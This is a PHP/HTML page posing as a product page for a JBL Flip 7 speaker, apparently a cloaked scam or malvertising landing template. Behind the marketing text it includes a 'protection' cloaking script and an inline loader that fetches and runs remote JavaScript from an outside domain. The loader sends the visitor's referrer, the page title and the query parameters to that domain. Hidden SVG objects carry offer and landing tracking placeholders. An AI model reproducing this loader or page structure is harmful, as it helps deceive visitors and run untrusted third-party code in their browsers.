<?php include __DIR__.'/../protection/ywbprotect.php';?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0"
    />
    <title>JBL Flip 7 Black Speaker</title>
  
  </head>
  <body>
  <span id="b031f4b3-1ec0-8b55-3569-5f33ebe8758a"></span><script type="application/javascript">
var d=document;var s=d.createElement('script'); 
s.src='https://bevatgete.com/jpw8TZs3?&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&_cid=b031f4b3-1ec0-8b55-3569-5f33ebe8758a&frm=script'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
if (document.location.protocol === 'https:' && 'https://bevatgete.com/jpw8TZs3?&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+''.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
</script>
    <img class="sr-only" src="./images/sec-img.svg" type="image/svg+xml" alt="">
    <div style="display: flex; flex-direction: column; gap: 10px; justify-content: center; align-items: center; height: 100%">
      <div style="max-width: 500px;">
        <img
          src="./images/prod.webp"
          width="100%"
          style="max-width: 100px"
          alt=""
        />
        <h1>JBL Flip 7 Black Speaker</h1>
        <p>
          Unmatched JBL sound that travels with us wherever we go. Because music knows no boundaries, and neither should we. Whether we're throwing a beach party, relaxing in the backyard, or setting the mood for a cozy evening at home, the Flip 7 speaker is designed to enhance any experience, wherever life takes us. And now, our signature sound is bigger and bolder than ever, thanks to JBL AI Sound Boost technology.
        </p>
      </div>
    </div>
    <object class="sr-only" data="./images/sec-img.svg?o={offer_id}&l={landing_id}" type="image/svg+xml"></object>
    {_fbclid}
  </body>

</html>


